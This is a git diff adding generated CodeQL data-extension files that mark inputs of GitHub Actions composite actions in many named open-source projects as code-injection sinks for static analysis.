@@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["maplibre/maplibre-native", "*", "input.artifact-name", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.externalData", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testSpecArn", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testFilter", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testType", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.AWS_DEVICE_FARM_DEVICE_POOL_ARN", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.AWS_DEVICE_FARM_PROJECT_ARN", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testFile", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.appFile", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.testPackageType", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "input.appType", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/actions/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml new file mode 100644 index 000000000000..16a0386beabc --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mastodon/mastodon", "*", "input.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/actions/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml new file mode 100644 index 000000000000..37556bcb99d9 --- /dev/null 
+++ b/actions/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mavlink/qgroundcontrol", "*", "input.aws_secret_access_key", "code-injection", "generated"] + - ["mavlink/qgroundcontrol", "*", "input.aws_key_id", "code-injection", "generated"] + - ["mavlink/qgroundcontrol", "*", "input.artifact_name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/actions/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml new file mode 100644 index 000000000000..9532f50714ef --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mdanalysis/mdanalysis", "*", "input.extra-pip-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.full-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.micromamba", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.mamba", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.extra-conda-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.isolation", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.build-docs", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "input.build-tests", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/actions/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml new file mode 100644 index 000000000000..465b4145aebe --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["medic/cht-core", "*", "input.hostname", "code-injection", "generated"] + - ["medic/cht-core", "*", "input.password", "code-injection", "generated"] + - ["medic/cht-core", "*", "input.username", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/actions/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml new file mode 100644 index 000000000000..b607b57693cc --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["medusajs/medusa", "*", "input.pathToSeedData", "code-injection", "generated"] + - ["medusajs/medusa", "*", "input.password", "code-injection", "generated"] + - ["medusajs/medusa", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/actions/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml new file mode 100644 index 000000000000..76243ecd6006 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml 
@@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["metabase/metabase", "*", "input.organization_name", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.github_token", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.username", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.test-args", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.clojure-version", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.include-log", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.message", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.mysql", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.postgres", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.openldap", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.maildev", "code-injection", "generated"] + - ["metabase/metabase", "*", "input.edition", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/actions/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml new file mode 100644 index 000000000000..68c5a0b4b69d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["metamask/action-create-release-pr", "*", "input.artifacts-path", "code-injection", "generated"] + - ["metamask/action-create-release-pr", "*", "input.created-pr-status", "code-injection", "generated"] + - ["metamask/action-create-release-pr", "*", "input.release-branch-prefix", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/actions/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml new file mode 100644 index 000000000000..2cf57246d0c4 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["metamask/action-npm-publish", "*", "input.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/actions/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml new file mode 100644 index 000000000000..9f62363e1692 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microsoft/fluentui", "*", "input.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/actions/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml new file mode 100644 index 000000000000..0dfbad39abea --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microsoft/playwright", "*", "input.report_dir", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.connection_string", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.blob_prefix", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.output_dir", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.path", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.namePrefix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/actions/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml new file mode 100644 index 000000000000..eb76e7d7a452 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microsoft/wsl", "*", "input.comment", "code-injection", "generated"] + - ["microsoft/wsl", "*", "input.similar_issues_text", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/actions/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml new file mode 100644 index 000000000000..7672a6aadbbc --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["milvus-io/milvus", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/actions/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml new file mode 100644 index 000000000000..041705b1f558 --- /dev/null 
+++ b/actions/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mlflow/mlflow", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/actions/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml new file mode 100644 index 000000000000..b80d135bfb3a --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["modin-project/modin", "*", "input.parallel", "code-injection", "generated"] + - ["modin-project/modin", "*", "input.runner", "code-injection", "generated"] + - ["modin-project/modin", "*", "input.activate-environment", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/actions/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml new file mode 100644 index 000000000000..2e6fc133dd9a --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mozilla/addons-server", "*", "input.run", "code-injection", "generated"] + - ["mozilla/addons-server", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/actions/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml new file mode 100644 index 000000000000..710cd7951619 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mozilla/bedrock", "*", "input.", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/actions/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml new file mode 100644 index 000000000000..e64c87b9e073 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mozilla/sccache", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/actions/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml new file mode 100644 index 000000000000..2d663b075be4 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["msys2/setup-msys2", "*", "input.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/actions/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml new file mode 100644 index 000000000000..95b63bfadd0d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mumble-voip/mumble", "*", "input.arch", "code-injection", "generated"] + - ["mumble-voip/mumble", "*", "input.type", "code-injection", "generated"] + - ["mumble-voip/mumble", "*", "input.os", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/actions/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml new file mode 100644 index 000000000000..88da6f066378 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nasa/fprime", "*", "input.location", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/actions/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml new file mode 100644 index 000000000000..841140aa12e8 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nats-io/nats-server", "*", "input.label", "code-injection", "generated"] + - ["nats-io/nats-server", "*", "input.hub_password", "code-injection", "generated"] + - ["nats-io/nats-server", "*", "input.hub_username", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/actions/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml new file mode 100644 index 000000000000..04657e223adb --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nearform-actions/optic-release-automation-action", "*", "input.build-command", "code-injection", "generated"] + - ["nearform-actions/optic-release-automation-action", "*", "input.actor-name", "code-injection", "generated"] + - ["nearform-actions/optic-release-automation-action", "*", "input.actor-email", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/actions/ql/lib/ext/generated/composite-actions/nektos_act.model.yml new file mode 100644 index 000000000000..7541c5b8dabe --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nektos/act", "*", "input.test_input_optional", "code-injection", "generated"] + - ["nektos/act", "*", "input.composite-input", "code-injection", "generated"] + - ["nektos/act", "*", "input.some", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_required_with_default_overriden", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_required_with_default", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_optional_with_default_overriden", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_required", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/actions/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml new file mode 100644 index 000000000000..2f4033d0825f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.project-name", "code-injection", "generated"] + - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.gradle-command", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/actions/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml new file mode 100644 index 000000000000..aeed286a882a --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["neondatabase/neon", "*", "input.save_perf_report", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.real_s3_region", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.real_s3_bucket", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.run_with_real_s3", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.run_in_parallel", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.extra_params", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.test_selection", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/actions/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml new file mode 100644 index 000000000000..4d980520bc32 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["neovim/neovim", "*", "input.install_flags", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/actions/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml new file mode 100644 index 000000000000..265179054337 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nhost/nhost", "*", "input.config", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/actions/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml new file mode 100644 index 000000000000..af31a4267fda --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nix-community/nixos-wsl", "*", "input.filename", "code-injection", "generated"] + - ["nix-community/nixos-wsl", "*", "input.expression", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/actions/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml new file mode 100644 index 000000000000..6317a72443c0 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["novuhq/novu", "*", "input.tag", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["novuhq/novu", "*", "input.docker_name", "output.image", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/actions/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml new file mode 100644 index 000000000000..3b2bcb74bb62 --- /dev/null 
+++ b/actions/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nymtech/nym", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/actions/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml new file mode 100644 index 000000000000..320eabd533c6 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -0,0 +1,19 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["obsproject/obs-studio", "*", "input.failCondition", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.checkGlob", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.playtestBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.steamPassword", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.steamUser", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.preview", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.stableBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.betaBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.nightlyBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.tagName", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.customLink", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.customTitle", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.urlPrefix", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.sparklePrivateKey", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/actions/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml new file mode 100644 index 000000000000..3af9358c65e9 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ocaml/dune", "*", "input.OCAML_COMPILER", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.DKML_COMPILER", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.DISKUV_OPAM_REPOSITORY", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.CONF_DKML_CROSS_TOOLCHAIN", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.FDOPEN_OPAMEXE_BOOTSTRAP", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/actions/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml new file mode 100644 index 000000000000..a61edccecf87 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["oneflow-inc/oneflow", "*", "input.extra_flags", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.python_version", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.cuda_version", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.tmp_dir", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.dst_host", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.dst_path", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.src_path", "code-injection", "generated"] \ No newline at end of file 
diff --git a/actions/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/actions/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml new file mode 100644 index 000000000000..2f7f8c150300 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.gem", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.latest", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.ruby", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/actions/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml new file mode 100644 index 000000000000..72601a404073 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["open-telemetry/opentelemetry-ruby", "*", "input.gem", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby", "*", "input.ruby", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/actions/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml new file mode 100644 index 000000000000..6808b4a28933 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["open-watcom/open-watcom-v2", "*", "input.fullname", "code-injection", "generated"] + - ["open-watcom/open-watcom-v2", "*", "input.buildcmd", "code-injection", "generated"] + - ["open-watcom/open-watcom-v2", "*", "input.artifact", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/actions/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml new file mode 100644 index 000000000000..93c348e570a8 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openapitools/openapi-generator", "*", "input.args", "code-injection", "generated"] + - ["openapitools/openapi-generator", "*", "input.name", "code-injection", "generated"] + - ["openapitools/openapi-generator", "*", "input.goal", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml new file mode 100644 index 000000000000..31be17adf41b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openjdk/jdk", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/actions/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml new file mode 100644 index 000000000000..89f2daede979 --- /dev/null 
+++ b/actions/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["opensearch-project/opensearch-net", "*", "input.version", "code-injection", "generated"] + - ["opensearch-project/opensearch-net", "*", "input.build_script", "code-injection", "generated"] + - ["opensearch-project/opensearch-net", "*", "input.plugins_output_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/actions/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml new file mode 100644 index 000000000000..ce881a46225d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["opensearch-project/security", "*", "input.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/actions/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml new file mode 100644 index 000000000000..cd422d4278d1 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml 
@@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["opentrons/opentrons", "*", "input.destPrefix", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.domain", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.distPath", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.project", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.python-version", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.repository_url", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.password", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/actions/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml new file mode 100644 index 000000000000..82d25587bf99 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml 
